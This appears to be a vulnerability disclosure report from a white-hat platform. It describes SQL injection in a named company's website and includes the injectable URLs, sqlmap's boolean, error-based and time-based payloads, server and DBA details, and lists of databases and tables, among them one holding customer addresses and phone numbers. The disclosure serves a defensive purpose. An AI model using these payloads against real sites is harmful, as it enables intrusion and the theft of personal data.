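2015-08-17: Details reported to the vendor; awaiting vendor response
2015-08-18: Vendor confirmed; details disclosed to the vendor only
2015-08-28: Details disclosed to core white hats and experts in related fields
2015-09-07: Details disclosed to regular white hats
2015-09-17: Details disclosed to intern white hats
2015-10-02: Details disclosed to the public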
The website of a company under China Resources Group has a SQL injection vulnerability.
Injection points:
http://www.chinawufeng.com/cold.php?pid=13
http://www.chinawufeng.com/fast.php?pid=25
sqlmap identified the following injection point(s) with a total of 203 HTTP(s) requests:
---
Parameter: pid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pid=13' AND 9779=9779 AND 'KmPx'='KmPx

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: pid=13' AND (SELECT 8320 FROM(SELECT COUNT(*),CONCAT(0x7171767171,(SELECT (ELT(8320=8320,1))),0x7170627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eRRc'='eRRc

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: pid=13' AND SLEEP(5) AND 'WDGL'='WDGL
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.4.4
back-end DBMS: MySQL 5.0
available databases [6]:
[*] chinawufeng
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] wechat

current user: 'root@localhost'
current user is DBA: True

Database: chinawufeng
[18 tables]
+--------------------+
| lbcms_about        |
| lbcms_active       |
| lbcms_admin        |
| lbcms_applications |
| lbcms_buy          |
| lbcms_cdrink       |
| lbcms_channel      |
| lbcms_class        |
| lbcms_config       |
| lbcms_down         |
| lbcms_fast         |
| lbcms_field        |
| lbcms_rotpic       |
| lbcms_ticket       |
| ska_comments       |
| ska_users          |
| wtest_messagequeue |
| wtest_users        |
+--------------------+
-- Partial data
Database: chinawufeng
Table: lbcms_buy
[31 entries]
+------+---------+-------+
| addr | content | phone |
+------+---------+-------+
Severity: High
Vulnerability Rank: 12
Confirmation time: 2015-08-18 15:25
Thank you for the submission.
None yet